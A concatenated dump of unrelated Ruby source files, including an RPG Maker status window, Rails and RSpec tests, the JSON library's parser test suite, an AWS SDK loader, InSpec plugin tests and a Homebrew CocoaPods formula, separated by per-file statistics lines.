draw_horz_line(line_height * 13)
draw_block4 (line_height * 14)
end
#--------------------------------------------------------------------------
# * Draw Block 1
#--------------------------------------------------------------------------
def draw_block1(y)
draw_actor_name(@actor, 4, y)
draw_actor_class(@actor, 128, y)
draw_actor_nickname(@actor, 288, y)
end
#--------------------------------------------------------------------------
# * Draw Block 2
#--------------------------------------------------------------------------
def draw_block2(y)
draw_actor_face(@actor, 8, y)
draw_basic_info(136, y)
draw_exp_info(304, y)
end
#--------------------------------------------------------------------------
# * Draw Block 3
#--------------------------------------------------------------------------
def draw_block3(y)
draw_parameters(32, y)
draw_equipments(288, y)
end
#--------------------------------------------------------------------------
# * Draw Block 4
#--------------------------------------------------------------------------
def draw_block4(y)
draw_description(4, y)
end
#--------------------------------------------------------------------------
# * Draw Horizontal Line
#--------------------------------------------------------------------------
def draw_horz_line(y)
line_y = y + line_height / 2 - 1
contents.fill_rect(0, line_y, contents_width, 2, line_color)
end
#--------------------------------------------------------------------------
# * Get Color of Horizontal Line
#--------------------------------------------------------------------------
def line_color
color = normal_color
color.alpha = 48
color
end
#--------------------------------------------------------------------------
# * Draw Basic Information
#--------------------------------------------------------------------------
def draw_basic_info(x, y)
draw_actor_level(@actor, x, y + line_height * 0)
draw_actor_icons(@actor, x, y + line_height * 1)
draw_actor_hp(@actor, x, y + line_height * 2)
draw_actor_mp(@actor, x, y + line_height * 3)
end
#--------------------------------------------------------------------------
# * Draw Parameters
#--------------------------------------------------------------------------
def draw_parameters(x, y)
6.times {|i| draw_actor_param(@actor, x, y + line_height * i, i + 2) }
end
#--------------------------------------------------------------------------
# * Draw Experience Information
#--------------------------------------------------------------------------
def draw_exp_info(x, y)
s1 = @actor.max_level? ? "-------" : @actor.exp
s2 = @actor.max_level? ? "-------" : @actor.next_level_exp - @actor.exp
s_next = sprintf(Vocab::ExpNext, Vocab::level)
change_color(system_color)
draw_text(x, y + line_height * 0, 180, line_height, Vocab::ExpTotal)
draw_text(x, y + line_height * 2, 180, line_height, s_next)
change_color(normal_color)
draw_text(x, y + line_height * 1, 180, line_height, s1, 2)
draw_text(x, y + line_height * 3, 180, line_height, s2, 2)
end
#--------------------------------------------------------------------------
# * Draw Equipment
#--------------------------------------------------------------------------
def draw_equipments(x, y)
@actor.equips.each_with_index do |item, i|
draw_item_name(item, x, y + line_height * i)
end
end
#--------------------------------------------------------------------------
# * Draw Description
#--------------------------------------------------------------------------
def draw_description(x, y)
draw_text_ex(x, y, @actor.description)
end
end
| 40.373016 | 79 | 0.344211 |
08f09ce1fdabe8f3af8d0619637be242c2124572 | 444 | ENV['RAILS_ENV'] ||= 'test'
require_relative '../config/environment'
require 'rails/test_help'
#require 'minitest/reporters'
#Minitest::Reporters.use!
class ActiveSupport::TestCase
# Run tests in parallel with specified workers
parallelize(workers: :number_of_processors)
# Setup all fixtures in test/fixtures/*.yml for all tests in alphabetical order.
fixtures :all
# Add more helper methods to be used by all tests here...
end
| 27.75 | 82 | 0.754505 |
91812e937991159aae24ea315a0d264795e0ed7e | 1,160 | require_relative 'spec_helper'
describe Passenger do
after(:each) do
Passenger.destroy_all
end
describe 'attributes' do
it 'has data attributes from a migration file' do
joshua = Passenger.create(name: 'Josh RS', phone_num: '347 000 1111')
expect(joshua.name).to eq('Josh RS')
expect(joshua.phone_num).to eq('347 000 1111')
end
end
describe 'request_ride' do
it 'requests a ride as a passenger' do
joshua = Passenger.create(name: 'Josh RS', phone_num: '347 000 1111')
ride = joshua.request_ride('1000 Fake Pl.', '2000 Real St.', 20)
expect(ride.passenger).to eq(joshua)
expect(ride.pickup_loc).to eq('1000 Fake Pl.')
expect(ride.dropoff_loc).to eq('2000 Real St.')
expect(ride.fare).to eq(20)
end
end
describe 'recent_rides' do
it 'shows passenger\'s past rides' do
joshua = Passenger.create(name: 'Josh RS', phone_num: '347 000 1111')
ride1 = joshua.request_ride('1000 Fake Pl.', '2000 Real St.', 20)
ride2 = joshua.request_ride('2332 Fake Pl.', '3489 Real St.', 8)
expect(joshua.recent_rides).to include(ride1, ride2)
end
end
end | 30.526316 | 75 | 0.660345 |
e89d336196556ea95c3c9c38e4e1448f4284baa1 | 12,989 | #!/usr/bin/env ruby
# -*- coding: utf-8 -*-
require 'test/unit'
require File.join(File.dirname(__FILE__), 'setup_variant')
require 'stringio'
unless Array.method_defined?(:permutation)
begin
require 'enumerator'
require 'permutation'
class Array
def permutation
Permutation.for(self).to_enum.map { |x| x.project }
end
end
rescue LoadError
warn "Skipping permutation tests."
end
end
class TC_JSON < Test::Unit::TestCase
include JSON
def setup
@ary = [1, "foo", 3.14, 4711.0, 2.718, nil, [1,-2,3], false, true].map do
|x| [x]
end
@ary_to_parse = ["1", '"foo"', "3.14", "4711.0", "2.718", "null",
"[1,-2,3]", "false", "true"].map do
|x| "[#{x}]"
end
@hash = {
'a' => 2,
'b' => 3.141,
'c' => 'c',
'd' => [ 1, "b", 3.14 ],
'e' => { 'foo' => 'bar' },
'g' => "\"\0\037",
'h' => 1000.0,
'i' => 0.001
}
@json = '{"a":2,"b":3.141,"c":"c","d":[1,"b",3.14],"e":{"foo":"bar"},'\
'"g":"\\"\\u0000\\u001f","h":1.0E3,"i":1.0E-3}'
end
def test_construction
parser = JSON::Parser.new('test')
assert_equal 'test', parser.source
end
def assert_equal_float(expected, is)
assert_in_delta(expected.first, is.first, 1e-2)
end
def test_parse_simple_arrays
assert_equal([], parse('[]'))
assert_equal([], parse(' [ ] '))
assert_equal([nil], parse('[null]'))
assert_equal([false], parse('[false]'))
assert_equal([true], parse('[true]'))
assert_equal([-23], parse('[-23]'))
assert_equal([23], parse('[23]'))
assert_equal([0.23], parse('[0.23]'))
assert_equal([0.0], parse('[0e0]'))
assert_raises(JSON::ParserError) { parse('[+23.2]') }
assert_raises(JSON::ParserError) { parse('[+23]') }
assert_raises(JSON::ParserError) { parse('[.23]') }
assert_raises(JSON::ParserError) { parse('[023]') }
assert_equal_float [3.141], parse('[3.141]')
assert_equal_float [-3.141], parse('[-3.141]')
assert_equal_float [3.141], parse('[3141e-3]')
assert_equal_float [3.141], parse('[3141.1e-3]')
assert_equal_float [3.141], parse('[3141E-3]')
assert_equal_float [3.141], parse('[3141.0E-3]')
assert_equal_float [-3.141], parse('[-3141.0e-3]')
assert_equal_float [-3.141], parse('[-3141e-3]')
assert_raises(ParserError) { parse('[NaN]') }
assert parse('[NaN]', :allow_nan => true).first.nan?
assert_raises(ParserError) { parse('[Infinity]') }
assert_equal [1.0/0], parse('[Infinity]', :allow_nan => true)
assert_raises(ParserError) { parse('[-Infinity]') }
assert_equal [-1.0/0], parse('[-Infinity]', :allow_nan => true)
assert_equal([""], parse('[""]'))
assert_equal(["foobar"], parse('["foobar"]'))
assert_equal([{}], parse('[{}]'))
end
def test_parse_simple_objects
assert_equal({}, parse('{}'))
assert_equal({}, parse(' { } '))
assert_equal({ "a" => nil }, parse('{ "a" : null}'))
assert_equal({ "a" => nil }, parse('{"a":null}'))
assert_equal({ "a" => false }, parse('{ "a" : false } '))
assert_equal({ "a" => false }, parse('{"a":false}'))
assert_raises(JSON::ParserError) { parse('{false}') }
assert_equal({ "a" => true }, parse('{"a":true}'))
assert_equal({ "a" => true }, parse(' { "a" : true } '))
assert_equal({ "a" => -23 }, parse(' { "a" : -23 } '))
assert_equal({ "a" => -23 }, parse(' { "a" : -23 } '))
assert_equal({ "a" => 23 }, parse('{"a":23 } '))
assert_equal({ "a" => 23 }, parse(' { "a" : 23 } '))
assert_equal({ "a" => 0.23 }, parse(' { "a" : 0.23 } '))
assert_equal({ "a" => 0.23 }, parse(' { "a" : 0.23 } '))
end
if Array.method_defined?(:permutation)
def test_parse_more_complex_arrays
a = [ nil, false, true, "foßbar", [ "n€st€d", true ], { "nested" => true, "n€ßt€ð2" => {} }]
a.permutation.each do |perm|
json = pretty_generate(perm)
assert_equal perm, parse(json)
end
end
def test_parse_complex_objects
a = [ nil, false, true, "foßbar", [ "n€st€d", true ], { "nested" => true, "n€ßt€ð2" => {} }]
a.permutation.each do |perm|
s = "a"
orig_obj = perm.inject({}) { |h, x| h[s.dup] = x; s = s.succ; h }
json = pretty_generate(orig_obj)
assert_equal orig_obj, parse(json)
end
end
end
def test_parse_arrays
assert_equal([1,2,3], parse('[1,2,3]'))
assert_equal([1.2,2,3], parse('[1.2,2,3]'))
assert_equal([[],[[],[]]], parse('[[],[[],[]]]'))
end
def test_parse_values
assert_equal([""], parse('[""]'))
assert_equal(["\\"], parse('["\\\\"]'))
assert_equal(['"'], parse('["\""]'))
assert_equal(['\\"\\'], parse('["\\\\\\"\\\\"]'))
assert_equal(["\"\b\n\r\t\0\037"],
parse('["\"\b\n\r\t\u0000\u001f"]'))
for i in 0 ... @ary.size
assert_equal(@ary[i], parse(@ary_to_parse[i]))
end
end
def test_parse_array
assert_equal([], parse('[]'))
assert_equal([], parse(' [ ] '))
assert_equal([1], parse('[1]'))
assert_equal([1], parse(' [ 1 ] '))
assert_equal(@ary,
parse('[[1],["foo"],[3.14],[47.11e+2],[2718.0E-3],[null],[[1,-2,3]]'\
',[false],[true]]'))
assert_equal(@ary, parse(%Q{ [ [1] , ["foo"] , [3.14] \t , [47.11e+2]
, [2718.0E-3 ],\r[ null] , [[1, -2, 3 ]], [false ],[ true]\n ] }))
end
class SubArray < Array; end
class SubArray2 < Array
def to_json(*a)
{
JSON.create_id => self.class.name,
'ary' => to_a,
}.to_json(*a)
end
def self.json_create(o)
o.delete JSON.create_id
o['ary']
end
end
def test_parse_array_custom_class
res = parse('[]', :array_class => SubArray)
assert_equal([], res)
assert_equal(SubArray, res.class)
end
def test_parse_object
assert_equal({}, parse('{}'))
assert_equal({}, parse(' { } '))
assert_equal({'foo'=>'bar'}, parse('{"foo":"bar"}'))
assert_equal({'foo'=>'bar'}, parse(' { "foo" : "bar" } '))
end
class SubHash < Hash
end
class SubHash2 < Hash
def to_json(*a)
{
JSON.create_id => self.class.name,
}.merge(self).to_json(*a)
end
def self.json_create(o)
o.delete JSON.create_id
self[o]
end
end
def test_parse_object_custom_class
res = parse('{}', :object_class => SubHash2)
assert_equal({}, res)
assert_equal(SubHash2, res.class)
end
def test_generation_of_core_subclasses_with_new_to_json
obj = SubHash2["foo" => SubHash2["bar" => true]]
obj_json = JSON(obj)
obj_again = JSON(obj_json)
assert_kind_of SubHash2, obj_again
assert_kind_of SubHash2, obj_again['foo']
assert obj_again['foo']['bar']
assert_equal obj, obj_again
assert_equal ["foo"], JSON(JSON(SubArray2["foo"]))
end
def test_generation_of_core_subclasses_with_default_to_json
assert_equal '{"foo":"bar"}', JSON(SubHash["foo" => "bar"])
assert_equal '["foo"]', JSON(SubArray["foo"])
end
def test_generation_of_core_subclasses
obj = SubHash["foo" => SubHash["bar" => true]]
obj_json = JSON(obj)
obj_again = JSON(obj_json)
assert_kind_of Hash, obj_again
assert_kind_of Hash, obj_again['foo']
assert obj_again['foo']['bar']
assert_equal obj, obj_again
end
def test_parser_reset
parser = Parser.new(@json)
assert_equal(@hash, parser.parse)
assert_equal(@hash, parser.parse)
end
def test_comments
json = <<EOT
{
"key1":"value1", // eol comment
"key2":"value2" /* multi line
* comment */,
"key3":"value3" /* multi line
// nested eol comment
* comment */
}
EOT
assert_equal(
{ "key1" => "value1", "key2" => "value2", "key3" => "value3" },
parse(json))
json = <<EOT
{
"key1":"value1" /* multi line
// nested eol comment
/* illegal nested multi line comment */
* comment */
}
EOT
assert_raises(ParserError) { parse(json) }
json = <<EOT
{
"key1":"value1" /* multi line
// nested eol comment
closed multi comment */
and again, throw an Error */
}
EOT
assert_raises(ParserError) { parse(json) }
json = <<EOT
{
"key1":"value1" /*/*/
}
EOT
assert_equal({ "key1" => "value1" }, parse(json))
end
def test_backslash
data = [ '\\.(?i:gif|jpe?g|png)$' ]
json = '["\\\\.(?i:gif|jpe?g|png)$"]'
assert_equal json, JSON.generate(data)
assert_equal data, JSON.parse(json)
#
data = [ '\\"' ]
json = '["\\\\\""]'
assert_equal json, JSON.generate(data)
assert_equal data, JSON.parse(json)
#
json = '["/"]'
data = JSON.parse(json)
assert_equal ['/'], data
assert_equal json, JSON.generate(data)
#
json = '["\""]'
data = JSON.parse(json)
assert_equal ['"'], data
assert_equal json, JSON.generate(data)
json = '["\\\'"]'
data = JSON.parse(json)
assert_equal ["'"], data
assert_equal '["\'"]', JSON.generate(data)
end
def test_wrong_inputs
assert_raises(ParserError) { JSON.parse('"foo"') }
assert_raises(ParserError) { JSON.parse('123') }
assert_raises(ParserError) { JSON.parse('[] bla') }
assert_raises(ParserError) { JSON.parse('[] 1') }
assert_raises(ParserError) { JSON.parse('[] []') }
assert_raises(ParserError) { JSON.parse('[] {}') }
assert_raises(ParserError) { JSON.parse('{} []') }
assert_raises(ParserError) { JSON.parse('{} {}') }
assert_raises(ParserError) { JSON.parse('[NULL]') }
assert_raises(ParserError) { JSON.parse('[FALSE]') }
assert_raises(ParserError) { JSON.parse('[TRUE]') }
assert_raises(ParserError) { JSON.parse('[07] ') }
assert_raises(ParserError) { JSON.parse('[0a]') }
assert_raises(ParserError) { JSON.parse('[1.]') }
assert_raises(ParserError) { JSON.parse(' ') }
end
def test_nesting
assert_raises(JSON::NestingError) { JSON.parse '[[]]', :max_nesting => 1 }
assert_raises(JSON::NestingError) { JSON.parser.new('[[]]', :max_nesting => 1).parse }
assert_equal [[]], JSON.parse('[[]]', :max_nesting => 2)
too_deep = '[[[[[[[[[[[[[[[[[[[["Too deep"]]]]]]]]]]]]]]]]]]]]'
too_deep_ary = eval too_deep
assert_raises(JSON::NestingError) { JSON.parse too_deep }
assert_raises(JSON::NestingError) { JSON.parser.new(too_deep).parse }
assert_raises(JSON::NestingError) { JSON.parse too_deep, :max_nesting => 19 }
ok = JSON.parse too_deep, :max_nesting => 20
assert_equal too_deep_ary, ok
ok = JSON.parse too_deep, :max_nesting => nil
assert_equal too_deep_ary, ok
ok = JSON.parse too_deep, :max_nesting => false
assert_equal too_deep_ary, ok
ok = JSON.parse too_deep, :max_nesting => 0
assert_equal too_deep_ary, ok
assert_raises(JSON::NestingError) { JSON.generate [[]], :max_nesting => 1 }
assert_equal '[[]]', JSON.generate([[]], :max_nesting => 2)
assert_raises(JSON::NestingError) { JSON.generate too_deep_ary }
assert_raises(JSON::NestingError) { JSON.generate too_deep_ary, :max_nesting => 19 }
ok = JSON.generate too_deep_ary, :max_nesting => 20
assert_equal too_deep, ok
ok = JSON.generate too_deep_ary, :max_nesting => nil
assert_equal too_deep, ok
ok = JSON.generate too_deep_ary, :max_nesting => false
assert_equal too_deep, ok
ok = JSON.generate too_deep_ary, :max_nesting => 0
assert_equal too_deep, ok
end
def test_symbolize_names
assert_equal({ "foo" => "bar", "baz" => "quux" },
JSON.parse('{"foo":"bar", "baz":"quux"}'))
assert_equal({ :foo => "bar", :baz => "quux" },
JSON.parse('{"foo":"bar", "baz":"quux"}', :symbolize_names => true))
end
def test_load_dump
too_deep = '[[[[[[[[[[[[[[[[[[[[]]]]]]]]]]]]]]]]]]]]'
assert_equal too_deep, JSON.dump(eval(too_deep))
assert_kind_of String, Marshal.dump(eval(too_deep))
assert_raises(ArgumentError) { JSON.dump(eval(too_deep), 19) }
assert_raises(ArgumentError) { Marshal.dump(eval(too_deep), 19) }
assert_equal too_deep, JSON.dump(eval(too_deep), 20)
assert_kind_of String, Marshal.dump(eval(too_deep), 20)
output = StringIO.new
JSON.dump(eval(too_deep), output)
assert_equal too_deep, output.string
output = StringIO.new
JSON.dump(eval(too_deep), output, 20)
assert_equal too_deep, output.string
end
def test_big_integers
json1 = JSON([orig = (1 << 31) - 1])
assert_equal orig, JSON[json1][0]
json2 = JSON([orig = 1 << 31])
assert_equal orig, JSON[json2][0]
json3 = JSON([orig = (1 << 62) - 1])
assert_equal orig, JSON[json3][0]
json4 = JSON([orig = 1 << 62])
assert_equal orig, JSON[json4][0]
json5 = JSON([orig = 1 << 64])
assert_equal orig, JSON[json5][0]
end
end
| 33.219949 | 98 | 0.571099 |
877ffe936be4a41b2490753b1d8f38779231f8e4 | 1,427 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/version-3/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
require 'aws-sdk-core'
require 'aws-sigv4'
require_relative 'aws-sdk-iotwireless/types'
require_relative 'aws-sdk-iotwireless/client_api'
require_relative 'aws-sdk-iotwireless/client'
require_relative 'aws-sdk-iotwireless/errors'
require_relative 'aws-sdk-iotwireless/resource'
require_relative 'aws-sdk-iotwireless/customizations'
# This module provides support for AWS IoT Wireless. This module is available in the
# `aws-sdk-iotwireless` gem.
#
# # Client
#
# The {Client} class provides one method for each API operation. Operation
# methods each accept a hash of request parameters and return a response
# structure.
#
# io_t_wireless = Aws::IoTWireless::Client.new
# resp = io_t_wireless.associate_aws_account_with_partner_account(params)
#
# See {Client} for more information.
#
# # Errors
#
# Errors returned from AWS IoT Wireless are defined in the
# {Errors} module and all extend {Errors::ServiceError}.
#
# begin
# # do stuff
# rescue Aws::IoTWireless::Errors::ServiceError
# # rescues all AWS IoT Wireless API errors
# end
#
# See {Errors} for more information.
#
# @!group service
module Aws::IoTWireless
GEM_VERSION = '1.19.0'
end
| 26.425926 | 84 | 0.752628 |
33f0c983b8ac43b5833789759cc358b27b31ad79 | 697 | require 'rails_helper'
module DealRedemptions
RSpec.describe Admin::SettingsController, :type => :controller do
routes { DealRedemptions::Engine::routes }
let(:valid_session) { { admin_user_id: 1 } }
describe 'GET #index' do
before(:each) do
@user = FactoryGirl.create(:user)
get :index, nil, valid_session
end
it 'returns http success' do
expect(response).to be_success
end
it 'assigns @users to fetch users' do
expect(assigns(:users)).to match_array @user
end
it 'assigns @new_user to new user instance' do
expect(assigns(:new_user)).to be_a(DealRedemptions::User)
end
end
end
end
| 24.034483 | 67 | 0.642755 |
26607284cc95f6863ebef02f7ba7ccb2361cfd4a | 1,421 | =begin
#Tatum API
## Authentication <!-- ReDoc-Inject: <security-definitions> -->
OpenAPI spec version: 3.9.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 3.0.31
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for Tatum::TronTxInternalTransactions
# Automatically generated by swagger-codegen (github.com/swagger-api/swagger-codegen)
# Please update as you see appropriate
describe 'TronTxInternalTransactions' do
before do
# run before each test
@instance = Tatum::TronTxInternalTransactions.new
end
after do
# run after each test
end
describe 'test an instance of TronTxInternalTransactions' do
it 'should create an instance of TronTxInternalTransactions' do
expect(@instance).to be_instance_of(Tatum::TronTxInternalTransactions)
end
end
describe 'test attribute "internal_tx_id"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "to_address"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "from_address"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 26.811321 | 102 | 0.736805 |
21a3290419cf05252a4494fd6569fea16f2d375e | 2,540 | require "helper"
require "inspec/resource"
require "inspec/resources/os"
# require 'inspec/plugin/v1/plugin_types/resource'
describe Inspec::Plugins::Resource do
let(:base) { Inspec::Plugins::Resource }
describe "#name" do
it "won't register a nil resource" do
Class.new(base) { name nil; }
_(Inspec::Resource.registry.keys).wont_include nil
_(Inspec::Resource.registry.keys).wont_include ""
end
it "will register a valid name" do
Class.new(base) { name "hello"; }
_(Inspec::Resource.registry["hello"]).wont_be :nil?
end
end
def create(&block)
# random_name = (0...50).map { (65 + rand(26)).chr }.join
random_name = "NotSoRandomName"
Class.new(base) do
name random_name
instance_eval(&block)
end
Inspec::Resource.registry[random_name]
end
describe "#desc" do
it "will register a description" do
expected = rand.to_s
_(create { desc expected }.desc).must_equal expected
end
it "can change the description" do
c = create { desc rand.to_s }
c.desc(x = rand.to_s)
_(c.desc).must_equal x
end
end
describe "#example" do
it "will register a description" do
expected = rand.to_s
_(create { example expected }.example).must_equal expected
end
it "can change the description" do
c = create { example rand.to_s }
c.example(x = rand.to_s)
_(c.example).must_equal x
end
end
describe "supported platform" do
def supports_meta(supports)
@old = Inspec::Resource.supports[:os]
Inspec::Resource.supports[:os] = supports
load_resource("os")
end
after do
Inspec::Resource.supports[:os] = @old
end
it "loads a profile which supports multiple families" do
m = supports_meta([
{ os_family: "windows" },
{ os_family: "unix" },
])
_(m.check_supports).must_equal true
Inspec::Resource.supports["os"] = nil
end
it "loads a profile which supports multiple names" do
m = supports_meta([
{ os_family: "windows", os_name: "windows_2000" },
{ os_family: "unix", os_name: "ubuntu" },
])
_(m.check_supports).must_equal true
Inspec::Resource.supports["os"] = nil
end
it "reject a profile which supports multiple families" do
m = supports_meta([
{ os_family: "windows" },
{ os_family: "redhat" },
])
_(m.check_supports).must_equal false
Inspec::Resource.supports["os"] = nil
end
end
end
| 26.185567 | 64 | 0.626378 |
e9d30bee915a9b7154e1e260fe1952907c6294f0 | 985 | #
# Be sure to run `pod spec lint StashAnalytics.podspec' to ensure this is a
# valid spec and to remove all comments including this before submitting the spec.
#
# To learn more about Podspec attributes see https://guides.cocoapods.org/syntax/podspec.html
# To see working Podspecs in the CocoaPods repo see https://github.com/CocoaPods/Specs/
#
Pod::Spec.new do |spec|
spec.name = "StashAnalytics"
spec.version = "0.0.3"
spec.summary = "Stash is a Simple and privacy-focused mobile analytics"
spec.homepage = "http://usestash.com"
spec.license = "MIT"
spec.author = "Ciprian Redinciuc"
spec.platform = :ios, "14.0"
spec.ios.deployment_target = "14.0"
# spec.osx.deployment_target = "10.7"
# spec.watchos.deployment_target = "2.0"
# spec.tvos.deployment_target = "9.0"
spec.source = { :git => "https://github.com/usestash/stash-ios.git", :tag => "v#{spec.version}" }
spec.source_files = "Sources"
spec.swift_versions = ['5.0']
end
| 36.481481 | 99 | 0.692386 |
2146e50cd20d008e36cc5b3b79f57d0bca0e3803 | 92 | desc "Open a pry session preloaded with this library"
task :console do
sh "pry --gem"
end
| 18.4 | 53 | 0.728261 |
28e232a4a6e003fc9265f388a178999e8bec2b91 | 3,784 | #--
# Copyright (c) 2016 SolarWinds, LLC.
# All rights reserved.
#++
module AppOpticsAPM
module SDK
module CustomMetrics
# Send counts
#
# Use this method to report the number of times an action occurs. The metric counts reported are summed and flushed every 60 seconds.
#
# === Arguments:
#
# * +name+ (String) Name to be used for the metric. Must be 255 or fewer characters and consist only of A-Za-z0-9.:-*
# * +count+ (Integer, optional, default = 1): Count of actions being reported
# * +with_hostname+ (Boolean, optional, default = false): Indicates if the host name should be included as a tag for the metric
# * +tags_kvs+ (Hash, optional): List of key/value pairs to describe the metric. The key must be <= 64 characters, the value must be <= 255 characters, allowed characters: A-Za-z0-9.:-_
#
# === Example:
#
# class WorkTracker
# def counting(name, tags = {})
# yield # yield to where work is done
# AppOpticsAPM::SDK.increment_metric(name, 1, false, tags)
# end
# end
#
# === Returns:
# * 0 on success, error code on failure
#
def increment_metric(name, count = 1, with_hostname = false, tags_kvs = {})
return true unless AppOpticsAPM.loaded
with_hostname = with_hostname ? 1 : 0
tags, tags_count = make_tags(tags_kvs)
AppOpticsAPM::CustomMetrics.increment(name.to_s, count, with_hostname, nil, tags, tags_count) == 1
end
# Send values with counts
#
# Use this method to report a value for each or multiple counts. The metric values reported are aggregated and flushed every 60 seconds. The dashboard displays the average value per count.
#
# === Arguments:
#
# * +name+ (String) Name to be used for the metric. Must be 255 or fewer characters and consist only of A-Za-z0-9.:-*
# * +value+ (Numeric) Value to be added to the current sum
# * +count+ (Integer, optional, default = 1): Count of actions being reported
# * +with_hostname+ (Boolean, optional, default = false): Indicates if the host name should be included as a tag for the metric
# * +tags_kvs+ (Hash, optional): List of key/value pairs to describe the metric. The key must be <= 64 characters, the value must be <= 255 characters, allowed characters: A-Za-z0-9.:-_
#
# === Example:
#
# class WorkTracker
# def timing(name, tags = {})
# start = Time.now
# yield # yield to where work is done
# duration = Time.now - start
# AppOpticsAPM::SDK.summary_metric(name, duration, 1, false, tags)
# end
# end
#
# === Returns:
# * 0 on success, error code on failure
#
def summary_metric(name, value, count = 1, with_hostname = false, tags_kvs = {})
return true unless AppOpticsAPM.loaded
with_hostname = with_hostname ? 1 : 0
tags, tags_count = make_tags(tags_kvs)
AppOpticsAPM::CustomMetrics.summary(name.to_s, value, count, with_hostname, nil, tags, tags_count) == 1
end
private
def make_tags(tags_kvs)
unless tags_kvs.is_a?(Hash)
AppOpticsAPM.logger.warn("[appoptics_apm/metrics] CustomMetrics received tags_kvs that are not a Hash (found #{tags_kvs.class}), setting tags_kvs = {}")
tags_kvs = {}
end
count = tags_kvs.size
tags = AppOpticsAPM::MetricTags.new(count)
tags_kvs.each_with_index do |(k, v), i|
tags.add(i, k.to_s, v.to_s)
end
[tags, count]
end
end
extend CustomMetrics
end
end
| 39.831579 | 196 | 0.607822 |
7a1c82b1e2765ee3fbf761b62997f565942009d2 | 1,011 | class Cocoapods < Formula
desc "Dependency manager for Cocoa projects"
homepage "https://cocoapods.org/"
url "https://github.com/CocoaPods/CocoaPods/archive/1.6.0.tar.gz"
sha256 "7980fc1675d16c978324614f6ff6d2f98153e6805174c566cfa84cec9c336ba9"
bottle do
cellar :any_skip_relocation
sha256 "17db9489e0ca4fb2349b1f0046d7b5224a5764c420f575947719f605c3828d97" => :mojave
sha256 "fc004c866c668214225c4cc606bc00dc1418c577be1d58f166075ba998d32f6a" => :high_sierra
sha256 "9c31c82dd47fe218430bb21ff6b699e928d6f5df46ac0b7483ec679d678916a5" => :sierra
end
depends_on "ruby" if MacOS.version <= :sierra
def install
ENV["GEM_HOME"] = libexec
system "gem", "build", "cocoapods.gemspec"
system "gem", "install", "cocoapods-#{version}.gem"
# Other executables don't work currently.
bin.install libexec/"bin/pod", libexec/"bin/xcodeproj"
bin.env_script_all_files(libexec/"bin", :GEM_HOME => ENV["GEM_HOME"])
end
test do
system "#{bin}/pod", "list"
end
end
| 34.862069 | 93 | 0.748764 |
6aecb88080231a335975bbd8dc78bf5374d21883 | 1,011 | module Archer
module Routes
class Route
delegate :match?, to: :matcher
attr_reader :controller, :action
def initialize param, options
@type = options[:type]
@controller_path, @action = options[:to].split '#'
@action = @action.to_sym
@param = param
end
def view
@view ||= Views::ViewFinder.find_for @controller_path, @action
end
def for update
@controller = controller_klass.new update
self
end
private
def matcher
@matcher ||= \
case @param
when Regexp
Matchers::RegexpMatcher.new @param, @type
when Symbol
Matchers::CommandMatcher.new @param, @type
when Class
@param.new
else
Matchers::TypeMatcher.new @type
end
end
def controller_klass
@controller_klass ||= "#{ @controller_path.camelize }Controller".constantize
end
end
end
end
| 20.632653 | 84 | 0.558853 |
e8bc0d4f2c9b40e100c0c02fc0a8e1ab83541bd3 | 880 | require 'spec_helper_acceptance'
# Ensure SELinux is not disabled in bootloader configuration - Section 1.6.1.1
describe file('/etc/default/grub') do
it { should be_file }
it { should be_owned_by 'root' }
it { should be_grouped_into 'root' }
it { should be_mode 644 }
its(:content) { should match /GRUB_CMDLINE_LINUX_DEFAULT="quiet"/ }
its(:content) { should match /GRUB_CMDLINE_LINUX="audit=1"/ }
end
# Ensure the SELinux state is "enforcing" - Section 1.6.1.2
describe file('/etc/selinux/config') do
it { should be_file }
it { should be_owned_by 'root' }
it { should be_grouped_into 'root' }
it { should be_mode 644 }
its(:content) { should match /SELINUX=enforcing/ }
its(:content) { should match /SELINUXTYPE=targeted/ }
end
# Ensure SETroubleshoot is not installed - Section 1.6.1.4
describe package('selinuxtroubleshoot')
| 33.846154 | 78 | 0.701136 |
267f1ec7b521a9f1d643b800ae0ee9ae7b126574 | 242 | class CreateRepresentatives < ActiveRecord::Migration[5.1]
def change
create_table :representatives do |t|
t.string :name
t.string :party
t.string :office
t.integer :money
t.string :cid
end
end
end
| 17.285714 | 58 | 0.644628 |
793672b1d58e8e03f574aeabb38e0c96fd58415e | 1,462 | # coding: utf-8
class NotesController < ApplicationController
load_and_authorize_resource
before_filter :init_base_breadcrumb
def init_base_breadcrumb
drop_breadcrumb(t("menu.notes"), notes_path)
end
def index
@notes = current_user.notes.recent_updated.paginate(:page => params[:page], :per_page => 20)
set_seo_meta t("menu.notes")
drop_breadcrumb("列表")
end
def show
@note = Note.find(params[:id])
@note.hits.incr(1)
set_seo_meta("查看 » #{t("menu.notes")}")
drop_breadcrumb("查看")
end
def new
@note = current_user.notes.build
set_seo_meta("新建 » #{t("menu.notes")}")
drop_breadcrumb(t("common.create"))
end
def edit
@note = current_user.notes.find(params[:id])
set_seo_meta("修改 » #{t("menu.notes")}")
drop_breadcrumb("修改")
end
def create
@note = current_user.notes.new(params[:note])
if @note.save
redirect_to(@note, :notice => t("common.create_success"))
else
render :action => "new"
end
end
def update
@note = current_user.notes.find(params[:id])
if @note.update_attributes(params[:note])
redirect_to(@note, :notice => t("common.update_success"))
else
render :action => "edit"
end
end
def preview
render :text => MarkdownConverter.convert( params[:body] )
end
def destroy
@note = current_user.notes.find(params[:id])
@note.destroy
redirect_to(notes_url)
end
end
| 21.5 | 96 | 0.656635 |
28254cf0f9d2046c7738dc655e5940777f1f90a0 | 118 | class ApplicationController < ActionController::Base
def hello
render text: "hello, world!"
end
end
| 19.666667 | 52 | 0.677966 |
010dd1ef3847f2d47645483ad8b1c43eee760649 | 692 | module Hyperstack
module Component
module FreeRender
def self.included(base)
base.instance_eval do
alias :hyperstack_component_original_meth_missing method_missing
def method_missing(name, *args, &block)
if const_defined?(name) &&
(klass = const_get(name)) &&
((klass.is_a?(Class) && klass.method_defined?(:render)) ||
